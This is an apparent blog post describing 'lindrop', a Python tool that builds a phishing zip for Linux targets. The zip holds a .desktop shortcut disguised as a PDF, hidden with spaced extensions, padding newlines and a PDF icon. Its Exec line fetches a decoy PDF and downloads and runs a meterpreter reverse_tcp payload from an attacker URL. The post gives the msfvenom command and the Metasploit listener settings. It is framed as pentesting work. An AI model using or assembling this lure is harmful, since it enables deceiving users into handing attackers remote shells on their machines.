lindrop a social engineering vector for linux targets
A quick/dirty python utility that generates a zip containing a “malicious” .desktop (aka shortcut) file that masquerades as a PDF file (not really, sort of). This is probably nothing new, but i needed a way to specifically target linux users for certain social engineering engagements, where I could send a zip file via email, and generate something on-the-fly. So i came up with this quick mess of a tool.
It basically exploits the “Exec” section of a .desktop file to:
1. Download a PDF and display it to the user.
2. Download and execute a linux/x86/meterpreter/reverse_tcp payload.
There’s some really oldschool basic obfuscation involved in the creation of the .desktop file. For one, the file name is generated with spaces between the .pdf and .desktop extensions. This is to obfuscate the actual file extension when the .zip is just straight-up opened up in Archive Manager:
Second, there’s a bunch of newlines ‘\n’ in the actual .desktop file itself, so if double clicked on, from inside Archive Manager, unless you scroll all the way down, there’s nothing too obvious (aside from the fact it’s actually not a PDF. (lol)
Another thing to note here…the “Icon” section. This contains a reference to a local SVG file which gives the .desktop shortcut an icon. In this case, we’re using an icon that’s typically included with gnome and associated to PDF files. If this SVG file doesn’t exist on the target system, then the file will look like an executable, blowing its amazing cover story of being a PDF file.
Anyway…on to the tool…
Lindrop takes 4 inputs:An output name for the “PDF” (.desktop) file that will be in the zip. An output name for the ZIP file. A remote payload URL. (I.e., http://www.attacker.com/payload) This will be downloaded to the /tmp directory on the target box. For this example, we’re simply creating a payload with msfvenom:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload A remote PDF to download and display to the user. In the case of this example, we’re remotely loading Blackhat 2016’s Attendee survey: https://www.blackhat.com/docs/us-16/2016-Black-Hat-Attendee-Survey.pdf. Behind the scenes, Xpdf is used to open the PDF file.
You should end up with a zip file, all ready to send to your target:
Extracting the contents gives is a nice little quasi-“PDF” file:
Executing the file, from the perspective of the target, opens up (using Xpdf), the Blackhat presentation (or resume, or whichever PDF you tell it to download/open up):
On the attacker side, we have a listener up using the following resource file in metasploit, waiting for a connection from the payload the .desktop file has downloaded, and that we generated previously with msfvenom:
set ExitOnSession false
set LHOST 0.0.0.0
set LPORT 6666
set PAYLOAD linux/x86/meterpreter/reverse_tcp
Oh, this was all tested in the latest Kali Rolling. But will probably work on mostly all distros that handle .desktop files the same way. This code is probably buggy (won’t take spaces in any of the inputs, and probably other minor problems) and i’m sure could be improved. At the moment, it just drops a “pl892” payload in the /tmp directory, along with the remote PDF file downloaded to /tmp/temp.pdf.
You can download lindrop here:
本文系统（linux）相关术语:linux系统 鸟哥的linux私房菜 linux命令大全 linux操作系统
本文标题：lindrop a social engineering vector for linux targets